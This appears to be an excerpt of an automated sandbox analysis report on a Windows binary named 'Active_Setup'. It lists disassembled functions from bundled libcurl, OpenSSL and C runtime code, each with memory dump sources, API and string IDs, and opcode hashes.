                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: curl_maprintfcurl_msnprintf
                                                                                                                                                  • String ID: %s:%s$%sAuthorization: Basic %s$Basic$Proxy-
                                                                                                                                                  • API String ID: 974754520-2466770355
                                                                                                                                                  • Opcode ID: c01c4eb1ddca399c7dd04be0844b5cd49eadddbbab31cc9dc3c0285985e2bb42
                                                                                                                                                  • Instruction ID: e49d53fe2191bf54c12026158212f93c1f90ccac22af43ebc360d5708dd664e7
                                                                                                                                                  • Opcode Fuzzy Hash: c01c4eb1ddca399c7dd04be0844b5cd49eadddbbab31cc9dc3c0285985e2bb42
                                                                                                                                                  • Instruction Fuzzy Hash: 1221B17160020AAFCB10DF18DD4AFA637E4FF80718F44856DF9898B251E775E948DBA2
                                                                                                                                                  Function 00FC2BC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • curl_maprintf.ACTIVE_SETUP(%s%s%s%s%s%s%lld%s%s,#HttpOnly_,010E44E2,00000001,FALSE,?,?,?,00FB85F1,?,?,00000000,?), ref: 00FC2C55
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: curl_maprintf
                                                                                                                                                  • String ID: #HttpOnly_$%s%s%s%s%s%s%lld%s%s$FALSE$TRUE$unknown
                                                                                                                                                  • API String ID: 3307269620-3817228265
                                                                                                                                                  • Opcode ID: 460a9519b138ddae8482dbb03ab0eb9e243756f6b3bb9baf6809916a6f0b15cb
                                                                                                                                                  • Instruction ID: c9189bc53b8f9c987d2b637bdc3b4998673b4e531bf91fb8b17d94ac2df31ad4
                                                                                                                                                  • Opcode Fuzzy Hash: 460a9519b138ddae8482dbb03ab0eb9e243756f6b3bb9baf6809916a6f0b15cb
                                                                                                                                                  • Instruction Fuzzy Hash: 1111D0B9B0124B5FDB6CCA06CA65F277B99FB85234F25805DA944CB312C761DC40E350
                                                                                                                                                  Function 01080571 Relevance: 9.1, APIs: 6, Instructions: 71threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • ___set_flsgetvalue.LIBCMT ref: 010805A2
                                                                                                                                                  • __calloc_crt.LIBCMT ref: 010805AE
                                                                                                                                                  • __getptd.LIBCMT ref: 010805BB
                                                                                                                                                  • CreateThread.KERNEL32(00000000,?,010804EE,00000000,00000000,00FB2076), ref: 010805F2
                                                                                                                                                  • GetLastError.KERNEL32 ref: 010805FC
                                                                                                                                                  • __dosmaperr.LIBCMT ref: 01080614
                                                                                                                                                    • Part of subcall function 01081557: __getptd_noexit.LIBCMT ref: 01081557
                                                                                                                                                    • Part of subcall function 0107F669: __decode_pointer.LIBCMT ref: 0107F674
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1803633139-0
                                                                                                                                                  • Opcode ID: f7f0cdb4a0e865142aa05f377e1d6a6a81660bbcf3a16bf4ef3d6218efb454d9
                                                                                                                                                  • Instruction ID: abaafab024139ec862be1fa0aa5084c3d748c942bc1ef1d15bbfd893afe43f62
                                                                                                                                                  • Opcode Fuzzy Hash: f7f0cdb4a0e865142aa05f377e1d6a6a81660bbcf3a16bf4ef3d6218efb454d9
                                                                                                                                                  • Instruction Fuzzy Hash: 1711017250820AEFDB11BFA8DC818DE7BE8FF54224B200469F6C1D2055EB718955CBA0
                                                                                                                                                  Function 01091222 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __CreateFrameInfo.LIBCMT ref: 0109124A
                                                                                                                                                    • Part of subcall function 0108659E: __getptd.LIBCMT ref: 010865AC
                                                                                                                                                    • Part of subcall function 0108659E: __getptd.LIBCMT ref: 010865BA
                                                                                                                                                  • __getptd.LIBCMT ref: 01091254
                                                                                                                                                    • Part of subcall function 01087909: __getptd_noexit.LIBCMT ref: 0108790C
                                                                                                                                                    • Part of subcall function 01087909: __amsg_exit.LIBCMT ref: 01087919
                                                                                                                                                  • __getptd.LIBCMT ref: 01091262
                                                                                                                                                  • __getptd.LIBCMT ref: 01091270
                                                                                                                                                  • __getptd.LIBCMT ref: 0109127B
                                                                                                                                                  • _CallCatchBlock2.LIBCMT ref: 010912A1
                                                                                                                                                    • Part of subcall function 01086643: __CallSettingFrame@12.LIBCMT ref: 0108668F
                                                                                                                                                    • Part of subcall function 01091348: __getptd.LIBCMT ref: 01091357
                                                                                                                                                    • Part of subcall function 01091348: __getptd.LIBCMT ref: 01091365
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1602911419-0
                                                                                                                                                  • Opcode ID: 4ffbaf156f4785ed560571b9c94abbba180d586fd4d1860d56abd700f98dbd25
                                                                                                                                                  • Instruction ID: f1b44a3dc634e9590b98144c781a63b976dd134084048f7fe5c541c9e337593a
                                                                                                                                                  • Opcode Fuzzy Hash: 4ffbaf156f4785ed560571b9c94abbba180d586fd4d1860d56abd700f98dbd25
                                                                                                                                                  • Instruction Fuzzy Hash: 60110771D0420ADFDF01EFA5D944AED7BB0FF18324F60806AE8D4A7250DB399A119F50
                                                                                                                                                  Function 0104CD60 Relevance: 9.0, APIs: 6, Instructions: 26COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _signal.LIBCMT ref: 0104CD68
                                                                                                                                                    • Part of subcall function 010851F4: __getptd_noexit.LIBCMT ref: 0108525E
                                                                                                                                                    • Part of subcall function 010851F4: __malloc_crt.LIBCMT ref: 0108527D
                                                                                                                                                    • Part of subcall function 010851F4: _siglookup.LIBCMT ref: 010852A3
                                                                                                                                                  • _signal.LIBCMT ref: 0104CD76
                                                                                                                                                    • Part of subcall function 010851F4: __lock.LIBCMT ref: 010852E8
                                                                                                                                                    • Part of subcall function 010851F4: SetConsoleCtrlHandler.KERNEL32(01085115,00000001,?,?,?,?,010E5250,00000010,0104CD6D,00000016,00000000), ref: 0108530B
                                                                                                                                                    • Part of subcall function 010851F4: __decode_pointer.LIBCMT ref: 01085357
                                                                                                                                                    • Part of subcall function 010851F4: __encode_pointer.LIBCMT ref: 01085365
                                                                                                                                                  • _signal.LIBCMT ref: 0104CD84
                                                                                                                                                    • Part of subcall function 010851F4: GetLastError.KERNEL32(?,?,?,?,010E5250,00000010,0104CD6D,00000016,00000000), ref: 01085327
                                                                                                                                                    • Part of subcall function 010851F4: __decode_pointer.LIBCMT ref: 01085377
                                                                                                                                                    • Part of subcall function 010851F4: __encode_pointer.LIBCMT ref: 01085385
                                                                                                                                                  • _signal.LIBCMT ref: 0104CD91
                                                                                                                                                    • Part of subcall function 010851F4: __decode_pointer.LIBCMT ref: 01085397
                                                                                                                                                    • Part of subcall function 010851F4: __encode_pointer.LIBCMT ref: 010853A5
                                                                                                                                                  • _signal.LIBCMT ref: 0104CD9F
                                                                                                                                                    • Part of subcall function 010851F4: __decode_pointer.LIBCMT ref: 010853B7
                                                                                                                                                    • Part of subcall function 010851F4: __encode_pointer.LIBCMT ref: 010853C5
                                                                                                                                                  • _signal.LIBCMT ref: 0104CDAD
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _signal$__decode_pointer__encode_pointer$ConsoleCtrlErrorHandlerLast__getptd_noexit__lock__malloc_crt_siglookup
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1354346430-0
                                                                                                                                                  • Opcode ID: 3e6d98ddf54be52e0afe7919fcbc688cdd7e7fc6b09c5e927841180c1d75884c
                                                                                                                                                  • Instruction ID: 6e50b830cfe08d9a93d1cb94273bebe59037e8f4debe02cf1428d9a9b4a4c954
                                                                                                                                                  • Opcode Fuzzy Hash: 3e6d98ddf54be52e0afe7919fcbc688cdd7e7fc6b09c5e927841180c1d75884c
                                                                                                                                                  • Instruction Fuzzy Hash: 27E0597A2441816AFE14F7A8ED83FB73219B795B00F00410C7BC89E584DEB66844C762
                                                                                                                                                  Function 0104CE20 Relevance: 9.0, APIs: 6, Instructions: 26COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _signal.LIBCMT ref: 0104CE27
                                                                                                                                                    • Part of subcall function 010851F4: __getptd_noexit.LIBCMT ref: 0108525E
                                                                                                                                                    • Part of subcall function 010851F4: __malloc_crt.LIBCMT ref: 0108527D
                                                                                                                                                    • Part of subcall function 010851F4: _siglookup.LIBCMT ref: 010852A3
                                                                                                                                                  • _signal.LIBCMT ref: 0104CE38
                                                                                                                                                    • Part of subcall function 010851F4: __lock.LIBCMT ref: 010852E8
                                                                                                                                                    • Part of subcall function 010851F4: SetConsoleCtrlHandler.KERNEL32(01085115,00000001,?,?,?,?,010E5250,00000010,0104CD6D,00000016,00000000), ref: 0108530B
                                                                                                                                                    • Part of subcall function 010851F4: __decode_pointer.LIBCMT ref: 01085357
                                                                                                                                                    • Part of subcall function 010851F4: __encode_pointer.LIBCMT ref: 01085365
                                                                                                                                                  • _signal.LIBCMT ref: 0104CE49
                                                                                                                                                    • Part of subcall function 010851F4: GetLastError.KERNEL32(?,?,?,?,010E5250,00000010,0104CD6D,00000016,00000000), ref: 01085327
                                                                                                                                                    • Part of subcall function 010851F4: __decode_pointer.LIBCMT ref: 01085377
                                                                                                                                                    • Part of subcall function 010851F4: __encode_pointer.LIBCMT ref: 01085385
                                                                                                                                                  • _signal.LIBCMT ref: 0104CE5A
                                                                                                                                                    • Part of subcall function 010851F4: __decode_pointer.LIBCMT ref: 01085397
                                                                                                                                                    • Part of subcall function 010851F4: __encode_pointer.LIBCMT ref: 010853A5
                                                                                                                                                  • _signal.LIBCMT ref: 0104CE6B
                                                                                                                                                    • Part of subcall function 010851F4: __decode_pointer.LIBCMT ref: 010853B7
                                                                                                                                                    • Part of subcall function 010851F4: __encode_pointer.LIBCMT ref: 010853C5
                                                                                                                                                  • _signal.LIBCMT ref: 0104CE7C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _signal$__decode_pointer__encode_pointer$ConsoleCtrlErrorHandlerLast__getptd_noexit__lock__malloc_crt_siglookup
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1354346430-0
                                                                                                                                                  • Opcode ID: 8f114f1a4ba0b82d6ba35eb316499521a5e147234618e0d012789c26fe9f6753
                                                                                                                                                  • Instruction ID: 6aa716c30fbeca65c612a53104bbe797045253536ab7c28cea72148594f7498a
                                                                                                                                                  • Opcode Fuzzy Hash: 8f114f1a4ba0b82d6ba35eb316499521a5e147234618e0d012789c26fe9f6753
                                                                                                                                                  • Instruction Fuzzy Hash: 63F0E2FAA86302A6FB107B716EC7B5A39506710A04F00052DBAD4BE685EFFA6045D709
                                                                                                                                                  Function 00FF92B0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 248COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memset
                                                                                                                                                  • String ID: $%02x%c$%04x - $%s%04x - <SPACES/NULS>
                                                                                                                                                  • API String ID: 2102423945-310954626
                                                                                                                                                  • Opcode ID: 6a060ec20f73cfe11269bbdec12b515e03e222ff43ab45d7dfc230b316f986d3
                                                                                                                                                  • Instruction ID: 5d2c89ed49b9114b1f7da4bf020a918484d9a726fc0743cfad0ecc7bccce07d7
                                                                                                                                                  • Opcode Fuzzy Hash: 6a060ec20f73cfe11269bbdec12b515e03e222ff43ab45d7dfc230b316f986d3
                                                                                                                                                  • Instruction Fuzzy Hash: 108116729083499FC324DA58CC81BFFB3E9EFD8704F44482DF69587291E6B5D9089B92
                                                                                                                                                  Function 00FEEE80 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 140COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _strncmp
                                                                                                                                                  • String ID: .\crypto\x509v3\v3_ncons.c$excluded$permitted
                                                                                                                                                  • API String ID: 909875538-3320112686
                                                                                                                                                  • Opcode ID: a9b83aeef086ee6397881eff9a8d00c88d46fd87ba2843fd20c0e60a94d30664
                                                                                                                                                  • Instruction ID: e365a78ea7e5660b487a8a45ff659b22feda416c91ac6f527d30f7858e4971f7
                                                                                                                                                  • Opcode Fuzzy Hash: a9b83aeef086ee6397881eff9a8d00c88d46fd87ba2843fd20c0e60a94d30664
                                                                                                                                                  • Instruction Fuzzy Hash: AB416EB2B403815BE720E766EC82F6773859FC4714F08043DF9899E383F665E905A3A2
                                                                                                                                                  Function 00FD2E60 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 140COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • curl_maprintf.ACTIVE_SETUP(%sAuthorization: NTLM %s,Proxy-,?), ref: 00FD2F3D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: curl_maprintf
                                                                                                                                                  • String ID: %sAuthorization: NTLM %s$NTLM$Proxy-
                                                                                                                                                  • API String ID: 3307269620-3263743893
                                                                                                                                                  • Opcode ID: dda0a6c9b1e4e0d60c8590dc016b49ec6980854b67279f10d87ab4211931e105
                                                                                                                                                  • Instruction ID: 769e14362e0d941b317f477f0f8828d0128f8040f8fabd1ba86c3bee6033f956
                                                                                                                                                  • Opcode Fuzzy Hash: dda0a6c9b1e4e0d60c8590dc016b49ec6980854b67279f10d87ab4211931e105
                                                                                                                                                  • Instruction Fuzzy Hash: D341A1B1A002058FD760DF59D948B67B7E9FF80314F18482EF5848B301E775E948DBA2
                                                                                                                                                  Function 00FC2700 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 128COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • curl_strequal.ACTIVE_SETUP(?,0109FD68,00000000,?,00000000,?,?,00FC2DF7,?), ref: 00FC275E
                                                                                                                                                  • _fgets.LIBCMT ref: 00FC27BE
                                                                                                                                                  • _fgets.LIBCMT ref: 00FC281E
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _fgets$curl_strequal
                                                                                                                                                  • String ID: Set-Cookie:$none
                                                                                                                                                  • API String ID: 1107385850-3629594122
                                                                                                                                                  • Opcode ID: a89a009ebd558818af561fcab99048b4b5132afa12f8bd14e1df65233e00c905
                                                                                                                                                  • Instruction ID: a199321809d5900e910179b3bd2df08d2f1daae94e72396a5141bfc01d9752a5
                                                                                                                                                  • Opcode Fuzzy Hash: a89a009ebd558818af561fcab99048b4b5132afa12f8bd14e1df65233e00c905
                                                                                                                                                  • Instruction Fuzzy Hash: D0317B71E043075BD7706F145E87F9776D4DF50324F18442EF885DB282EB65CD44A2A2
                                                                                                                                                  Function 00FD7130 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
